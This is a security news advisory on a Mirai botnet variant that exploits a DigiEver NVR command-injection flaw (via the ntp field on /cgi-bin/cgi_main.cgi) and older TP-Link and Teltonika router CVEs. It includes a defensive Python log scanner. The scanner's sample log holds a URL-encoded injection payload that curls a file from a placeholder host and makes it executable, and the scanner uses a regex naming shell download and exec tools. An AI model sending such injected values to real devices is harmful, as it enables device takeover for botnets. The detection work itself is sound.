Attack

Botnet actively exploits flaws in NVRs, TP-Link routers

Take action: If you are running DigiEver NVRs, TP-Link routers or Teltonika routers, review the advisory. If possible, isolate the devices from the internet and patch them immediately. Most of the exploited flaws are over a year old, so patches should be available.

Researchers report that a new variant of the Mirai botnet has been discovered actively exploiting multiple vulnerabilities. The campaign has been active since at least September 2024.

  • Untracked RCE vulnerability in DigiEver DS-2105 Pro NVRs - affects the '/cgi-bin/cgi_main.cgi' URI and allows unauthenticated remote command injection
    • No CVE assigned yet
    • Currently unpatched
  • CVE-2023-1389 (CVSS score 8.8) - affects TP-Link devices
  • CVE-2018-17532 (CVSS score 9.8) - affects Teltonika RUT9XX routers

The botnet exploits improper input validation in DigiEver NVRs to inject commands like 'curl' and 'chmod' through parameters such as the ntp field in HTTP POST requests. Once a device is compromised, the malware downloads additional binaries from external servers, establishes persistence through cron jobs and uses the device for DDoS attacks.
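Because the DigiEver flaw is unpatched, defenders are left with detection. The script below is an added example (not from the advisory or from DigiEver) that scans web-server request logs for POST requests to '/cgi-bin/cgi_main.cgi' whose form fields carry shell metacharacters or download/exec tool names, which is the pattern the paragraph above describes for the ntp field. The log layout ("src_ip method uri url-encoded-body"), the body format and the sample entries are all constructed for the example; adapt the parser to whatever your reverse proxy or NVR actually records.

```python
import re
from urllib.parse import parse_qs

# Constructed sample log, one request per line: "<src_ip> <method> <uri> <url-encoded body>".
# This layout is an assumption for the example, not DigiEver's real log format.
# Addresses are from the documentation ranges (RFC 5737).
SAMPLE_LOG = """\
203.0.113.7 POST /cgi-bin/cgi_main.cgi ntp=pool.ntp.org&tz=UTC
203.0.113.9 POST /cgi-bin/cgi_main.cgi ntp=pool.ntp.org%3Bcurl+http%3A%2F%2F198.51.100.5%2Fx+-o+%2Ftmp%2Fx%3Bchmod+%2Bx+%2Ftmp%2Fx&tz=UTC
203.0.113.4 GET /index.html -
198.51.100.20 POST /cgi-bin/cgi_main.cgi ntp=time.example.net&tz=Europe%2FBerlin
"""

# URI named in the advisory for the DigiEver command-injection flaw.
TARGET_URI = "/cgi-bin/cgi_main.cgi"

# A legitimate NTP server value is a hostname or IP literal: letters, digits, dots, hyphens, colons.
_BENIGN_VALUE = re.compile(r"^[A-Za-z0-9.\-:]*$")

# Shell metacharacters and download/exec tooling that never belong in a device-setting field.
_INJECTION_MARKER = re.compile(r"[;|&`$(){}<>]|\b(curl|wget|tftp|chmod|sh|bash)\b", re.IGNORECASE)


def inspect_request(src_ip, method, uri, body):
    """Return a finding dict for one request, or None when nothing suspicious is seen."""
    if method != "POST" or uri.split("?", 1)[0] != TARGET_URI:
        return None
    params = parse_qs(body, keep_blank_values=True)  # percent-decodes and '+'-decodes values
    for name, values in params.items():
        for value in values:
            if _BENIGN_VALUE.match(value):
                continue  # plain hostname / IP literal, nothing to flag
            hit = _INJECTION_MARKER.search(value)
            if hit:
                return {"src_ip": src_ip, "param": name, "marker": hit.group(0), "value": value}
    return None


def scan_log(text):
    """Parse the constructed log layout and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue  # blank or malformed line
        src_ip, method, uri, body = parts
        finding = inspect_request(src_ip, method, uri, "" if body == "-" else body)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"ALERT {f['src_ip']} param={f['param']} marker={f['marker']!r} value={f['value']!r}")
```

The allow-list check on the value (hostname characters only) runs before the marker search, so ordinary settings such as a time zone containing a slash do not raise alerts; only a value that is both non-hostname-shaped and carries a shell operator or a tool name is reported. On a device that cannot be patched, the same rule can be expressed as a WAF or reverse-proxy block on the CGI path.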

Users are advised to isolate the devices from the internet where possible, and to patch devices immediately. Most of the exploited flaws are over a year old.
